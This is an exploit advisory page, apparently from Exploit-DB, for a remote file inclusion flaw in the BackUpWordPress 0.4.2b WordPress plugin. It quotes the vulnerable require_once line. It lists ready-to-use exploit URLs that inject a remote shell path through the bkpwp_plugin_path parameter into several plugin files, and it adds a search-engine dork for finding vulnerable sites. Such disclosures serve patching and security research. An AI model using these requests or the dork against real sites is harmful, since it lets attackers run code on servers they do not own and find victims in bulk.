Lucene search

K
exploitdbS.W.A.T.EDB-ID:4593
HistoryNov 01, 2007 - 12:00 a.m.

WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion

2007-11-0100:00:00
S.W.A.T.
www.exploit-db.com
113

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%

--------------------------------- [ Xmors Underground Team ! ] --------------------------------------

Title : BackUpWordPress <= 0.4.2b Remote File Inclusion Vulnerability

--------------------------------------------------------------------------------
#Author: S.W.A.T.


#cont@ct: [email protected]

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"

--------------------------------------------------------------------------------



--------------------------------- [http://www.xmors.com ] --------------------------------------

# milw0rm.com [2007-11-01]

7.4 High

AI Score

Confidence

Low

0 Low

EPSS

Percentile

0.0%